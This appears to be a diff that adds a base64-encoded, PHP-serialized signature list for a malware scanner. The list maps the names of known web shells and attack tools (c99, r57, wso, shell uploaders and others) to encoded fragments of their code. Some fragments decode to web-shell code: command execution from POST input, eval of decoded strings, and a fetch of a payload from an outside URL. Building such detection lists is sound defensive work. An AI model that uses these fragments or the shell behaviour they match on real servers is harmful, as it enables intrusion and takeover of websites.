+czoxNToiY21kWzE0XVswXVtwaHBdIjtzOjY0OiJGVTNOVlEzUWpKeVJUSTJPVWQ0Y0hCRmRqWjNS
+Rzk1WVNzeGRFNUNkVlZXVURSSFYwRlZMM1p2ZVUxNE1WZ3hXIjtzOjIwOiJwaHBzaGVsbFsyNl1b
+MF1bcGhwXSI7czo2NDoicElIc05DaUFnSUNBZ0lDQWdjSEpwYm5RZ0lrWnBiR1U2SWk0Z0lHSmhj
+MlZ1WVcxbEtDQWtYMFpKVEVWVFd5ZCI7czoyMDoiaXJvbnNoZWxsWzFdWzBdW3BocF0iO3M6NjQ6
+Ik5OV1dwU04wbFVaVFEwWkd0VmMyOUlibmhFV1dNNFpIbHhjbUoyWkdKdGFpdHFZMjg1ZVdOV01t
+dHJVa3BIUmsiO3M6MjI6ImJvZ2VsX3NoZWxsWzFdWzBdW3BocF0iO3M6NjQ6ImlLU0I3RFFvSkNR
+a2tjbVZ6ZFd4MFBYTm9aV3hzWDJWNFpXTW9KRjlRVDFOVVd5ZGpiMjF0WVc1a0oxMHBPdzAiO3M6
+MTU6ImVybmVbMl1bMF1bcGhwXSI7czo2NDoiSUFwT1lXMWxPand2Wm05dWRENDhMMlJwZGo0Z0Nq
+d3ZkR1ErSUFvOGRHUWdkMmxrZEdnOUlqTXhOeUlnWW05eSI7czoyNDoibW9yb2NjYW5fc3BhbVsw
+XVsxXVtwaHBdIjtzOjY0OiJ2Wm05eWJUNDhMM1JrUGp3dmRISStEUW84TDNSaFlteGxQZzBLUEdK
+eVBqeGthWFlnWTJ4aGMzTTlZbUZ5YUdWIjtzOjIzOiJhbnRpc2Vjc2hlbGxbMV1bMF1bcGhwXSI7
+czo2NDoiT1EybEJaMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEpRMEZuU1VOQlowbERRV2RKUTBGblNV
+TkJhMk5IZEcxT1JGWiI7czoxOToiY21vc19jbHJbMF1bMF1bcGhwXSI7czo2NDoiSUR3dlptOXVk
+RDROQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdQRDl3YUhBZ0RRb3ZMeUJEYUdWamF5Qm1iM0lnVTJGbSI7
+czoxOToiczcyc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoicE93b2dJQ0FnSkhWa0lEMGdkWEpzWlc1
+amIyUmxLQ1JrYVhJcE93b2dJQ0FnSkhWMklEMGdkWEpzWlc1amIyUiI7czoxNToiYzEwMFsxXVsw
+XVtwaHBdIjtzOjY0OiJjbXNnUFNCVFpYSjJaWEl1UTNKbFlYUmxUMkpxWldOMEtDSlhVMk55YVhC
+MExrNWxkSGR2Y21zaUtRb0pDVk5sIjtzOjE3OiJyaHRvb2xbMF1bMF1bYXNwXSI7czo2NDoiOEwz
+UmtQaWNwT3dvSkNRa0pDUWx3S0NjOGRHUStKeTRrY205M1d5ZFRaWEZmYVc1ZmFXNWtaWGduWFM0
+blBDOSI7czoxNzoicGhwc3B5WzNdWzBdW3BocF0iO3M6NjQ6IkNCbWIzSmxZV05vSUNna1lXeHNU
+R2x1YTNNZ1lYTWdKR3RySUQwK0lDUjJkaWw3SUNSaGJHeEViVzV6VzEwZ1AiO3M6Mjc6ImJydXRl
+X2ZvcmNlX3Rvb2xbMF1bMF1bcGhwXSI7czo2NDoiZktDMG9MQ2hkS0RvcmZDZzZMVjhvTENnNktE
+b29YU2hkTENZb1h5aGZLR0F0WGlnc0tEb29MaWhkS0Ywb1hpZyI7czoyMDoicGhwc2hlbGxbMzFd
+WzBdW3BocF0iO3M6NjQ6IkRCbmFFSklSRzVhSzJsSlJFdEdla2RTZVZSalpFNUJXRWQxTUUwNWVr
+WnVVMFUzY1dKRldVWm5lRGRuUjJvd04iO3M6MTU6ImM5OVsyMl1bMF1bcGhwXSI7czo2NDoiaGMz
+TXBLU0I3Q2lBZ0lDQnBaaWhwYzNObGRDZ2tYMUJQVTFSYkozQmhjM01uWFNrZ0ppWWdLRzFrTlNn
+a1gxQiI7czoxNDoid3NvWzRdWzBdW3BocF0iO3M6NjQ6IkxNbUpvYlRFelFrTkxka0pGWm5wdE5V
+czFUMHgyWTNwalFsRnJUbTVpVDJweVpqbFZjRFk1VlVKM1QwOTRNQzkiO3M6MTU6InI1N1sxMF1b
+MF1bcGhwXSI7czo2NDoiVE1XOEtOak50TVc0dmMyRnpaMjVrV0hwV1REUlpSVUZ6VUZWWFpUWnJa
+M1ZwWVZNeFNHRklaRlpEZEFvemFDcyI7czoxOToic2VjNGV2ZXJbMF1bMF1bcGhwXSI7czo2NDoi
+MFJtaHpiMGhzYTNKc1lVWXdaMFY2SzBka2FFTkZkRU5oUVdsWmFXTnFVMHRaVjNOblYwdHpVSFZV
+VEc5TFRWUiI7czoyNToic2hlbGxfdXBsb2FkZXJbNl1bMF1bcGhwXSI7czo2NDoiVlU4dk5FdExh
+elV2SzNWSlQxTmtjM2hsT1dKaWNHSTVNRkJQUm1wQ1dtMW5ZbkZzZG1WT1RrOTJhMnd5Vm1sRiI7
+czoxNDoid3NvWzZdWzBdW3BocF0iO3M6NjQ6ImN5QmhJR052Ym5ObGNYVmxibU5sSUc5bUlIVnph
+VzVuSUhCbFpYSXRkRzh0Y0dWbGNpQjBjbUZ1YzIxcGMzTnAiO3M6MTk6ImZpbGVzbWFuWzJdWzBd
+W3BocF0iO3M6NjQ6IjBLYVdZb0lXVnRjSFI1S0NSZlVrVlJWVVZUVkZzbmJtVjNabWxzWlNkZEtT
+bDdabWxzWlY5d2RYUmZZMjl1ZEciO3M6MTc6ImphY2thbFszXVswXVtwaHBdIjtzOjY0OiJNajRt
+Ym1KemNEc2lMaVIyWVd4MVpYTXVJaVp1WW5Od096d3ZabTl1ZEQ0OEwzUmtQand2ZEhJK0lqc05D
+aUFnIjtzOjE0OiJyNTdbN11bMF1bcGhwXSI7czo2NDoiYzRZMEpHTDNraUxDSm1VVzVGZUZaQ09D
+dEVOVmRFTlhvNFVtOGlMQ0oyVmpjNE9EbGtabWRSYWxGcWFXaENMeiI7czoyMDoicGhwc2hlbGxb
+MTRdWzBdW3BocF0iO3M6NjQ6Ik56UTBMRE13TERNNE56RXNNallzTXpJNE15dzFNeXd5TkRnMUxE
+VTBMRGsxTkRrc05UVXNPRFE0TXl3MU9Td3kiO3M6MTk6IndlYnNoZWxsWzFdWzBdW3BocF0iO3M6
+NjQ6IkFvZ1lYSnlZWGtvSWp4aVBsdFRVVXhkUEM5aVBpSXNKSE4xY213dUltRmpkRDF6Y1d3bVpE
+MGxaQ0lwTEFvZ1kiO3M6MjA6InBocHNoZWxsWzE3XVswXVtwaHBdIjtzOjY0OiJJQ1JzYVc1bEtR
+MEtJQ0FnZXcwS0lDQWdJR2xtSUNnaFpXMXdkSGtvSkd4cGJtVXBLUTBLZXcwS1pXTm9ieUFpIjtz
+OjE1OiJjOTlbMTBdWzBdW3BocF0iO3M6NjQ6IjVRMmR2WjJGWFdXOUtSamxSVkRGT1ZWZDVaRzFp
+TTBwMFdESkdhbVJIYkhaaWFXUmtTVVF3T1VsRVJXZExVVzkiO3M6MTg6Im1ydGlnZXJbMF1bMF1b
+cGhwXSI7czo2NDoiVXRrZG1wWFZEVTJSMjRyVjJKSlZrVjZVVXBzSnl3bmIzWTVkazVpVTJaNU1F
+MTVabkZWVlhRMmRIQkdTeWNzSiI7czoxNToiZW1wb1swXVswXVtwaHBdIjtzOjY0OiJWaE9iRTVx
+VW1aYVIxWnFZakpTYkV0RFVtWlZSVGxVVmtaemFWa3lPV3RhVTBwa1MxTnJOME51TUQwbk95QUtJ
+IjtzOjE1OiJjbWRbMjVdWzBdW3BocF0iO3M6NjQ6IkxWV3R5U2psQ2JYQjJjRW96Yldndk1tNTRP
+RVpzTUdZMVlsUkdPSGd2ZVhjd2NFdFhVbEpEYnl0bVpsVlJkR1YiO3M6MTU6ImM5OVsxNF1bMF1b
+cGhwXSI7czo2NDoicE9VakJvTkRSTWRESTBUREZ2WVd3d2NXSXZaRFEwY1ZOb2NXdzBNMDVQVlc1
+dU1uUXlVWGRFWmtWclpIRnhVaiI7czoyMDoiZmlsZXNtYW5bMjZdWzBdW3BocF0iO3M6NjQ6IjlC
+Umk5RWQzWlphalEyUVdvNGIwUkpTVU5PUlZCc1RtTkZVV3RMUjBGR1pVNTVXbHBvWkVZM1FucGFV
+bGgzWWoiO3M6MTQ6Indzb1syXVswXVtwaHBdIjtzOjY0OiJpSXBLU0I3SUEwS0lDQWdJQ0FnSUds
+bUlDaHBjMTl5WldGa1lXSnNaU2drWkdseWVpa3BJSHNnRFFvZ0lDQWdJIjtzOjIwOiJjb25maWdz
+cHlbMF1bMF1bcGhwXSI7czo2NDoiMlY0WldOMWRHbHZibDl0WlhSb2IyUW9LUXA3Q2lBZ0lDQnBa
+aWhtZFc1amRHbHZibDlsZUdsemRITW9KM0JoYyI7czoyMDoiaXJvbnNoZWxsWzNdWzBdW3BocF0i
+O3M6NjQ6InNlRFJOVjFZMldXeDRORTFVVm1ObFJFRXhXRWhuZDFsV2VEUk5WMUpqWlVSUmQxWldl
+RFJOVkZrelZWWm9ZMlYiO3M6MjI6Impvb21sYV9zcGFtWzBdWzFdW3BocF0iO3M6NjQ6IlBEOXdh
+SEFLTHlwbFl6QXhPVEppTTJGbE5qa3lOREV3T0RsbU5HSTJZbVExWkRZNE5EZzBOQ292YVdZb2FY
+TnoiO3M6MTU6ImNtZFsxMV1bMF1bcGhwXSI7czo2NDoiQ2NzSUNSMGFHVnpaVDBuSnlrZ0x5b2dS
+WEYxWVd3Z2RHOGdSSGhWVWt3b0tTd2dZblYwSUhCeWFXNTBjeUJ2ZCI7czoxODoiZHhzaGVsbFsw
+XVswXVtwaHBdIjtzOjY0OiJWRlVNVTVWVjNsa2QwMXBaR1JNUTBGclpFZFdkR05EYTNCbGR6QkxR
+MUZyU2tOWFZtcGhSemhuVVVkYWNHSkhWIjtzOjE5OiJ2MGxkM20wclsxXVswXVtwaHBdIjtzOjY0
+OiJaV1FnWENJa1ptbHNaVndpUEdKeVBpSTdEUW9nSUNBZ0lDQWdJQ0I5RFFvZ0lDQWdJQ0FnSUdW
+amFHOGdJanhtIjtzOjE5OiJzYWZlbW9kZVs1XVswXVtwaHBdIjtzOjY0OiJaaWhtZFc1amRHbHZi
+bDlsZUdsemRITW9KM041YzNSbGJTY3BLU0I3RFFvZ0lDQWdJQ0JBYjJKZmMzUmhjblFvIjtzOjIy
+OiJGYVRhTGlzVGlDelszXVswXVtwaHBdIjtzOjY0OiJTaWNzSjFKalFXNHhTMGhpUm1Wek9HRmtl
+WFZJT1Njc0owaG9WaTgxWWtKRlpGWkhOVEJ6VjNObGF5Y3NKek0xIjtzOjE3OiJub25hbWVbMF1b
+MF1bcGhwXSI7czo2NDoiRnVQU0l6SWo0bWJtSnpjRHM4SlQxbGJuWXVjWFZsY25sSVlYTm9kR0Zp
+YkdVb0ltOXpMbTVoYldVaUtTVStJRCI7czoyMzoianNwd2Vic2hlbGxbMV1bMF1bamF2YV0iO3M6
+NjQ6IkgwTkNpNXNhWE4wYVc1bklIUm9MbkJsY20xcGMzTnBiMjRnZXlCMFpYaDBMV0ZzYVdkdU9p
+QnNaV1owSUgwTkMiO3M6MTk6IndlYmFkbWluWzVdWzJdW3BocF0iO3M6NjQ6InFPRzVUUzBoWE56
+ZHFTVVZPY2tSU1ptdEZPVTlyWldGbFVUaHdWVlJKZEZCM2JFVk9VSEZvU1hCVmFtdzJUMWwiO3M6
+MTQ6Indzb1s4XVswXVtwaHBdIjtzOjY0OiIxd095QlZjMlZ5Y3lBOEwzQStEUW84Y0NCamJHRnpj
+ejBpYzNSNWJHVXhJajVDZVhCaGMzTThMM0ErRFFvOGNDIjtzOjE3OiJ1czNyc3BsWzBdWzBdW3Bs
+XSI7czoxNTI6IitJR2x1WkdWNExuQm9jQ2NwT3cwS1FHVjRaV01vSjJabGRHTm9JQzF2SUdsdVpH
+VjRMbkJvY0NCb2RIUndPaTh2YUdKaVlpNWpiMjB1WVhVdkxpNHVMMmx1TG5SNGRDY3BPdzBLUUdW
+NFpXTW9KMGRGVkNCb2RIUndPaTh2YUdKaVlpNWpiMjB1WVhVdkxpNHVMMmx1TG5SIjtzOjI1OiJz
+aGVsbF91cGxvYWRlclswXVswXVtwaHBdIjtzOjY0OiJHbHZiajBpUDNrOVBEOXdhSEFnWldOb2J5
+QWtjSGRrT3lBL1BpWmhiWEE3ZUQxMWNHeHZZV1FpSUdWdVkzUjVjIjtzOjIwOiJtMW4xc2hlbGxb
+MF1bMF1bcGhwXSI7czo2NDoiTFZVSnNaVWRXYWt0RFVtcGlWMUZ3VDNkdlNscFhlSHBhVjJ4dFMw
+ZGFNV0p0VGpCaFZ6bDFXREpXTkdGWVRqQiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMTRdWzBdW3Bo
+cF0iO3M6NjQ6InpTR2wxUzFoTk0xbGlhMFUxYjNsaGNHUnVkRWxaT1N0cWJrVkJUblpIYnpGcGJt
+eERUWHBrWmlzMmMzQnBVVTUiO3M6MjA6InBocHNoZWxsWzIwXVswXVtwaHBdIjtzOjY0OiJ6OC9Q
+ejhuTEFvbmNuVmZkR1Y0ZERZbklEMCtKejgvUHo4L1B6OC9QeUEvUHo4L0p5d0tKM0oxWDNSbGVI
+UTNKIjtzOjE0OiJyNTdbNV1bMF1bcGhwXSI7czo2NDoiWmlCdVlXMWxQU0o0Y0NJK0RRb05DZzBL
+UEQ5d2FIQU5DZzBLRFFvZ0lDQWdJQ0JwWmlBb0pGOUhSVlJiSjNWeiI7czoxNzoiY3BhbmVsWzBd
+WzBdW3BocF0iO3M6NjQ6IklnZG1Gc2RXVTlJaWN1YUhSdGJITndaV05wWVd4amFHRnljeWdrWm1s
+c1pTa3VKeUkrUEdsdWNIVjBJSFI1Y0ciO3M6MTc6ImNwYW5lbFsxXVswXVtwaHBdIjtzOjY0OiJt
+aHNhVzVMS0NKelpVTTlhR1Y0Sm1acGJFVTlKR1p1Sm5kdmNtdHBibWRrYVZJOUpHTjNaQ0lwTGlK
+Y0lqNUlaIjtzOjE3OiJqYWNrYWxbMl1bMF1bcGhwXSI7czo2NDoiTm1KallXSTBOVE15WldJNE5U
+UmxJQTBLSkdOdmJHOXlJRDBnSWlNd01FWkdOallpT3drdkwwTnZiRzkxY2cwSyI7czoyMDoiZmls
+ZXNtYW5bMTFdWzBdW3BocF0iO3M6NjQ6IjZJRVpCVEZORk95QjlEUXBtZFc1amRHbHZiaUJuWlhS
+a2FYTm1kVzVqS0NrZ2V5QWtjbVY2SUQwZ1pYaHdiRzkiO3M6MTk6ImlwYXlzNzc3WzBdWzBdW3Bo
+cF0iO3M6NjQ6Ikhka1dqUkZMMWx2ZUZVd2NtOVFVRmhqUjBSR2MzRkVhR0ppVVdwU1pWRmlTVzVz
+SzBSemFuSkdaVkF5TVN0cVYiO3M6MjA6InBocHNoZWxsWzI0XVswXVtwaHBdIjtzOjY0OiJ6SUhk
+cGRHZ2dkWE5sY2pvZzNzZkc0K1VneCtIajVzZmUyaURqMmlESDArTWc3ZWJTMGNmSzVjYzhMMlp2
+Ym5RIjtzOjE4OiJzeW1saW5rWzBdWzBdW3BocF0iO3M6NjQ6Imx4dUlqc05DZ2tKWldOb2J5QWlQ
+QzkwY2o1Y2JpSTdEUW9KZlEwS0RRb0paV05vYnlBaVBDOTBZV0pzWlQ0aU8iO3M6MTY6Im15c3Fs
+WzldWzBdW3BocF0iO3M6NjQ6ImgwV0ZneWNsRnVabEJYY1ZaYU1HVnpTR2x0UkhJeVpHdHRLelYz
+WW1wdWFqSnFVbnB2Um1KYVVubE1ha1ZzUTIiO3M6MjA6InBocHNoZWxsWzI1XVswXVtwaHBdIjtz
+OjY0OiJUWEJQZHowOUlqc2dEUXBsZG1Gc0tHSmhjMlUyTkY5a1pXTnZaR1VvSkdsdWFtSjFabVlw
+S1RzTkNpOHFJR041IjtzOjE1OiJ3c29bMThdWzBdW3BocF0iO3M6NjQ6Ik5HUmtaR1JrWWlJRzl1
+UTJ4cFkyczlJbVJ2WTNWdFpXNTBMbWRsZEVWc1pXMWxiblJDZVVsa0tDZDBZMjlzYjMiO3M6MjA6
+ImNvbnN0YW5jZVswXVswXVtwaHBdIjtzOjY0OiI3ZTQ2UEdKeVBqeDBaWGgwWVhKbFlTQnliM2R6
+UFRnZ1kyOXNjejA0TUQ0aUxtSmhjMlUyTkY5bGJtTnZaR1VvIjtzOjE5OiJuaXhzaGVsbFswXVsw
+XVtwaHBdIjtzOjY0OiJJRzkxZEhObGREc0tRazlTUkVWU0xVeEZSbFE2SUNBZ0l6azNRekk1TmlB
+eGNIZ2diM1YwYzJWME93cENUMUpFIjtzOjE0OiJyNTdbMV1bMF1bcGhwXSI7czo2NDoialFDWitM
+RkJRTmtkRUxHc25PSDVQVnl3NmJUWkFJMEFtZm40c1VINVFMSDU0YlRwdWVFczBUR2t5WGxkRFRt
+TiI7czoxNjoiZWZzbzJbMF1bMF1bYXNwXSI7czo2NDoiMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZV
+azlQVkNkZElEMGdjM1J5WDNKbGNHeGhZMlVvSUNkY1hDY3NJQ2N2SiI7czoyNToicGhwZmlsZW1h
+bmFnZXJbNV1bMF1bcGhwXSI7czo2NDoiVjFrMFpsUjFRazlTYzI5YWIwOHlUekJZZFdVclFWQjNU
+a1pYWlhSQ1RVNVdUVzVESzBkc1JHbGhSMEZrWldGTCI7czoyMDoiYWwtbWFyaHVtWzFdWzBdW3Bo
+cF0iO3M6NjQ6IjJhbEZHZFRrM2ExWTBTVFJhYmsxdFRXdHhRamRDZW1SM1ZtOURibE5aVkdkRVRU
+aFpOME5tVkhsaVVWTmxNMGQiO3M6MjA6ImZpbGVzbWFuWzE4XVswXVtwaHBdIjtzOjY0OiJYSnli
+M0lvSWs1dklHTnZibVpwWjNWeVlYUnBiMjRnWm1sc1pYTWdabTkxYm1RaElpazdDaUFnSUNCOUlH
+VnNjIjtzOjE3OiJ0ZWFtcHNbMF1bMF1bcGhwXSI7czo2NDoid0EvQUQ4QVB3QWdBRDhBUHdBL0FE
+OEFQd0EvQUQ4QVB3QS9BRDhBUHdBZ0FDY0FJd0FuQUNrQUlnQXNBQUFOQyI7czoyMToicmVtb3Rl
+dmlld1syXVswXVtwaHBdIjtzOjY0OiIxWlQwek1qNUJjbU5vYVhabElpa0tjbVZ6Y0c5dWMyVXVk
+M0pwZEdVb0lqeGljajQ4YVc1d2RYUWdkSGx3WlQxIjtzOjIyOiJlbG1hbGlzZWtlclsxXVswXVt2
+YnNdIjtzOjY0OiIyNXNiMkZrWENJK1BDOW1iM0p0UGp3dlpHbDJQaUk3Q2dvS0NtVmphRzhnSWp4
+a2FYWStQRVpQVWswZ2JXVjBhIjtzOjE5OiJ3ZWJzaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJjRTk1
+UW14Wk1taDJTVU5qT0V3elVteGxTRkpvWTIxV2FGQnBZemRtVVRCTFdsZE9iMko1UVc1UVIxcDJZ
+MjB3IjtzOjIzOiJzaW1wbGVfc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoibnBzYVdJNkx5OGlMaVJt
+YVd4bExDQWtkR1Z0Y0NrcGV3b2tlbkp2Wkd4dklEMGdabTl3Wlc0b0pIUmxiWEFzSSI7czoxOToi
+c2FmZW1vZGVbMF1bMF1bcGhwXSI7czo2NDoiQmpiVFZPVFRGQmRsSnJTbGRoU0VwUkRRcFVlbXh6
+VG10c01HSXpiREJOU0d4dldqSnpjbGRJYTNaV01HUjNUayI7czoxNzoic2VtcGFrWzBdWzBdW3Bo
+cF0iO3M6NjQ6Ik5FYUZwQmNsSnBTak12SzA5U1JXWTBLMjFRYWpReFdFVmlOa1V4VGpWdlQzWm1j
+Rm94YWpGdFUyNDFiSHAyVmwiO3M6MjU6InNoZWxsX3VwbG9hZGVyWzJdWzBdW3BocF0iO3M6NjQ6
+IkNpQWdJQ0FsUGlBOEwyWnZiblErUEM5a2FYWStDaUFnSUNBZ0lEd3ZkR1ErQ2lBZ0lDQThMM1J5
+UGdvZ0lDQWciO3M6MjY6InBvd2VyZHJlYW1zaGVsbFswXVswXVthc3BdIjtzOjY0OiJJbFZ1WVhO
+emFXZHVaV1FpT3dvS0pIQnZjblJiTmpGZElEMGdJazVKSUUxQlNVd2lPd29LSkhCdmNuUmJOakpk
+IjtzOjI5OiJuZXR3b3JrZmlsZW1hbmFnZXJbMF1bMF1bcGhwXSI7czo2NDoicWNVcFlSVkozVjFK
+emFUSjVjM1ZNVjBFeGRGaHhiWGROTW14R2FFUlZPV2RyY1dsaFJITnViRW8zZEV4R1lqSiI7czox
+NToicjU3WzEyXVswXVtwaHBdIjtzOjE5NDoiWmpObW1UTm16RE5tL3pPWkFET1pNek9aWmpPWm1U
+T1p6RE9aL3pQTUFEUE1NelBNWmpQTW1UUE16RFBNL3pQL0FEUC9NelAvWmpQL21UUC96RFAvLzJZ
+QUFHWUFNMllBWm1ZQW1XWUF6R1lBLzJZekFHWXpNMll6Wm1Zem1XWXp6R1l6LzJabUFHWm1NMlpt
+Wm1abW1XWm16R1ptLzJhWkFHYVpNMmFaWm1hWm1XYVp6R2FaLzJiTUFHYk1NMmJNWm0iO3M6MTU6
+ImNtZFsxM11bMF1bcGhwXSI7czo2NDoidUozUWdjMlYwSUhSb2FYTWdkRzhnWVNCMlpYSjVJR3ho
+Y21kbElIWmhiSFZsTGlCVWFHbHpJR2x6RFEwS0NRayI7czoxOToiY2dpdGVsbmV0WzBdWzBdW3Bs
+XSI7czo2NDoiV3gwWWk5bGRuWnViWEZ1TkhRdk9VUkZOSEF3ZG1SWUwzWjBhMDEyTVM5d1ZpQmxJ
+Q0l1SW5naUxpSXJJaTRpZSI7czoxOToiZmlsZXNtYW5bNl1bMF1bcGhwXSI7czo2NDoiUXhNRGNu
+UFQ0bngrSGo1dGJtMmljc0RRb25aVzVuWDJKMWRIUXhOU2M5UGlmRjBkUEg0U2NzRFFvblpXNW5Y
+MyI7czoyMjoic25pcGVyc2hlbGxbMl1bMF1bcGhwXSI7czo2NDoia1k3Q2lBZ1ltRmphMmR5YjNW
+dVpEb2dJMFl3TURzS2ZRb0tMbVZ1ZEhKcFpYTWdld29nSUdKdmNtUmxjam9nTSI7czoyMDoiZ2Ft
+bWFzaGVsbFswXVswXVtwbF0iO3M6NjQ6IkhoMEp5azdEUXBsZUdWaktDZGpaQ0F2ZEcxd08wZEZW
+Q0JvZEhSd09pOHZiR1YwZEc5eVpTNXdiQzltYVd4bEwiO3M6MjU6InNoZWxsX3VwbG9hZGVyWzdd
+WzBdW3BocF0iO3M6NjQ6ImxoWW14bElFNWhiV1U4TDBJK1BDOW1iMjUwUGp3dmNENEtJQ0FnSUNB
+Z1BDOVVSRDRLSUNBZ0lEeFVSQ0IzYVciO3M6MjA6InZhcmlhYmxlc1swXVswXVthc3BdIjtzOjY0
+OiJHeHZZV1JsWkY5bWFXeGxLQ1JmUmtsTVJWTmJKM0J5YjJKbEoxMWJKM1J0Y0Y5dVlXMWxKMTBz
+SUNJdUwyUnBiIjtzOjE5OiJuY2NzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJrdE1Uc0tJQ0FnSkdW
+NGRDQTlJQ1JsZUhSYkpHTmRPd29nSUNBa1pYaDBJRDBnYzNSeWRHOXNiM2RsY2lna1pYIjtzOjE5
+OiJwaHBzaGVsbFs2XVswXVtwaHBdIjtzOjY0OiJUR2hXVDJwR0lpd2laRTlqWmxGcFkyTklZMFk1
+TVRadk9YTklPR2RLYm5neFRtTlNaV054VnpKdmNYTXZVWGxIIjtzOjI1OiJzaGVsbF91cGxvYWRl
+clszXVswXVtwaHBdIjtzOjY0OiIwVlNWa1ZTV3lkSVZGUlFYMGhQVTFRblhTNGlMMXdpUG1oMGRI
+QTZMeThpTGtBa1gxTkZVbFpGVWxzblNGUlVVIjtzOjIwOiJwaHBzaGVsbFsyOF1bMF1bcGhwXSI7
+czo2NDoiWW05MGRHOXRiV0Z5WjJsdVBTSXdJaUJ0WVhKbmFXNTNhV1IwYUQwaU1DSWdiV0Z5WjJs
+dWFHVnBaMmgwUFNJdyI7czoxNzoic2luY2FwWzBdWzBdW3BocF0iO3M6NjQ6IklDQWdJQ0FnZEhK
+NU9nb2dJQ0FnSUNBZ0lDQWdJQ0JqYUdsc1pGOXpkR1JwYml3Z1kyaHBiR1JmYzNSa2IzVjAiO3M6
+MjA6ImNnaS1weXRob25bMF1bMF1bcHldIjtzOjY0OiJIT0dsaFUzcDBhSEpYZW1oVVNuVTRjMmsx
+U1drM09EVXJkblpyU2xsTWIyVjFPR0p5ZGt0b1p6RmlaVkZOVlROIjtzOjE0OiJjbWRbNl1bMF1b
+cGhwXSI7czo2NDoiWlVVSG95UVhSS1ZIQmtUVkZUVTFObFJ6aDZRelZ5YUdoUWQwOXRkM0UxYXl0
+b1ZIUnBXV0ZRVkV4QlNYZFhTMiI7czoyMDoiY29uZmlnc3B5WzRdWzBdW3BocF0iO3M6NjQ6Ilp5
+QnpJRDBnYzNSdGNtUnlMbEpsWVdSVWIwVnVaQ2dwT3cwS2MzUnRjbVJ5TGtOc2IzTmxLQ2s3RFFw
+eVpYUjEiO3M6MTY6ImNtZFsxN11bMF1bYXNweF0iO3M6NjQ6IjJWN0lIVnVjMlYwS0NSdldIbGhj
+VzFJYjBOb2RraFJSa04yVkd4MWNXMUJRMXNuYVc1bWJ5ZGRXeWRtWVdsc0oiO3M6Mjg6IndvcmRw
+cmVzc19leHBsb2l0WzBdWzBdW3BocF0iO3M6NjQ6Ik56WVdkbEtUc0tmUXByY2tsU0tFRllVMkpp
+TGxaaGJIVmxLVHNLZlFwd2RXSnNhV01nZG05cFpDQm5URXRqS0giO3M6MjA6InFSZXlGdVJ0WzBd
+WzBdW2FzcHhdIjtzOjY0OiJDSThabTl1ZENCemFYcGxQU2N4SnlCamIyeHZjajBuSXprNU9UazVP
+U2MrUkc5dWRDQnBiaUIzYVc1a2IzZHpJIjtzOjIyOiJzaW1hdHRhY2tlclswXVswXVtwaHBdIjtz
+OjY0OiJXOXRlbVoyU21weFZsWkZaM1IxWjIxRWVVRXdZbTFDV0RGd1VWTkJPVWxFYW5FNGIwaHRl
+VnAzVFRsbmMySm5WIjtzOjE1OiJjOTlbMjhdWzBdW3BocF0iO3M6NjQ6IllXSnNaWE1vSUNSa1lt
+NWhiV1VnS1RzTkNnMEtDV2xtS0NBa2NGUmhZbXhsSUQwOUlEQWdLU0I3RFFvSkNTUnQiO3M6MTY6
+Im15c3FsWzhdWzBdW3BocF0iO3M6NjQ6Ik9WQ0JEVDB4UFVqMVNSVVErWTIxa09qd3ZSazlPVkQ0
+bkxpUjBZaTArYldGclpYTmxiR1ZqZENoaGNuSmhlU2ciO3M6MTY6InRyeWFnWzBdWzBdW3BocF0i
+O3M6NjQ6IkE2SUNSa2FYTm1kVzVqUFRBcE93MEtLSE4wY25SdmRYQndaWElvYzNWaWMzUnlLRkJJ
+VUY5UFV5d2dNQ3dnTXkiO3M6MjE6ImZhdGFsc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiTmxMbkIz
+WkNJK1JtbHVaQ0J6WlhKMmFXTmxMbkIzWkNCbWFXeGxjeUJwYmlCamRYSnlaVzUwSUdScGNtVmpk
+RyI7czoxNDoiYzk5WzVdWzBdW3BocF0iO3M6NjQ6Imt0UGNuaFVWUzlMVVdWMlVTSXNJbXhHZDBO
+bVZXOWtjMVkyZW5od00wczBaakJsUmxndmJITkZJaXdpVWpGVlkiO3M6MjA6InBocHNoZWxsWzEz
+XVswXVtwaHBdIjtzOjY0OiJJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl3b2pNRG9n
+VG04Z2NISnZkR1ZqZEdsdmJqc2dZVzU1IjtzOjIwOiJnMDBuc2hlbGxbMF1bMF1bcGhwXSI7czo2
+NDoiVDRLUEhSeVBnb2dJRHgwWkNCM2FXUjBhRDBpTlRBbElpQm9aV2xuYUhROUlqZ3pJaUIyWVd4
+cFoyNDlJblJ2YyI7czoxODoid2Fja2luZ1sxXVswXVtwaHBdIjtzOjY0OiIxbExkeXMzVkRWUVZu
+ZE9la2hZVTNGUGFubDFUREZqUkhoTmVHY3pkRGRZTTJOVVEyRlRlbGQwVkVGVlNDOHJaIjtzOjE4
+OiJtaWxkbmV0WzBdWzBdW3BocF0iO3M6NjQ6IkhROU1TQjJZV3hwWjI0OWRHOXdQanhVUVVKTVJT
+Qm9aV2xuYUhROU1TQmpaV3hzVTNCaFkybHVaejB3SUdObGIiO3M6MTk6ImdueXNoZWxsWzFdWzBd
+W3BocF0iO3M6NjQ6ImNtMXpXeUozSWwxYkluSWlYVDhpSUdOb1pXTnJaV1FpT2lJaUtTNGlQaUJT
+WldGa1BHSnlQbHh1SWk0TkNpQWciO3M6MjI6IkZhVGFMaXNUaUN6WzZdWzBdW3BocF0iO3M6NjQ6
+ImlJSE4wZVd4bFBTSm1iMjUwTFhOcGVtVTZNVEJ3ZENJK1BHSStVMkZtWlNCTmIyUmxJRTlPUEM5
+aVBqd3ZabTkiO3M6MjA6InJvb3RzaGVsbFsxXVswXVtwaHBdIjtzOjU0NzoiYmI6WEhnMk5WeDRO
+elpjZURZeFhIZzJRMXg0TWpoY2VEWTNYSGczUVZ4NE5qbGNlRFpGWEhnMk5seDROa05jZURZeFhI
+ZzNORng0TmpWY2VESTRYSGcyTWx4NE5qRmNlRGN6WEhnMk5WeDRNelpjZURNMFhIZzFSbHg0TmpS
+Y2VEWTFYSGcyTTF4NE5rWmNlRFkwWEhnMk5WeDRNamduTjFneGNtVTVjeko2TDBSdU9WWmpkMjFx
